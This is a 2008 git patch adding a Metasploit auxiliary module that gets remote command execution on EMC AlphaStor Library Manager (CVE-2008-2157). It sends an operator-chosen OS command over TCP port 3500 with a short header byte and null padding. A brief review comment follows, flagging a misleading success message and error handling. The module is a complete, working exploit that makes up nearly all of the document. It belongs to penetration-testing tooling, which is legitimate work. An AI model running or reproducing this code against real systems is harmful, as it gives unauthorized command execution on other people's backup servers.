From d7e706f6af0121db58a179556ae115960a4e243d Mon Sep 17 00:00:00 2001
From: Mario Ceballos
Date: Sat, 11 Oct 2008 00:56:47 +0000
Subject: [PATCH] added aux module alphastor_librarymanager_exec.rb
git-svn-id: file:///home/svn/framework3/trunk@5737 4d416f70-5f16-0410-b530-b9f4589650da
---
.../emc/alphastor_librarymanager_exec.rb | 61 +++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
new file mode 100644
index 0000000000..d939ad5af3
--- /dev/null
+++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
@@ -0,0 +1,61 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'EMC AlphaStor Library Manager Arbitrary Command Execution',
+ 'Description' => %q{
+ EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability
+ because the application fails to properly sanitize user-supplied input.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],
+ [ 'CVE', 'CVE-2008-2157' ],
+ [ 'BID', '29398' ],
+ ],
+ 'DisclosureDate' => 'May 27 2008'))
+
+ register_options(
+ [
+ Opt::RPORT(3500),
+ OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
+ ], self.class)
+ end
+
+ def run
+ connect
+
+ data = "\x75" + datastore['CMD']
+ pad = "\x00" * 512
+
+ pkt = data + pad
+
+ # commands are executed blindly.
+ print_status("Sending command: #{datastore['CMD']}")
+ sock.put(pkt)
+
+ sleep(1)
+
+ sock.get_once
+
+ print_status("Executed '#{datastore['CMD']}'...")
+
+ disconnect
+ end
+end
+
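Review bot: The closing `print_status("Executed '...'...")` in `run` reports success although the comment above it says commands are executed blindly and the value returned by `sock.get_once` is discarded, so the log of an authorized assessment reads the same whether or not anything ran on the host. A neutral message such as `print_status("Command sent; the service gives no confirmation of execution")` would keep the result honest for whoever triages it. `CMD` is also registered as optional (`false`), so if it is cleared `datastore['CMD']` is presumably nil and `"\x75" + datastore['CMD']` raises a TypeError; marking the option required (`true`) avoids that. Finally, `connect` and `disconnect` are not paired through `ensure`, so an exception from `sock.put` or `sock.get_once` would leave the socket open.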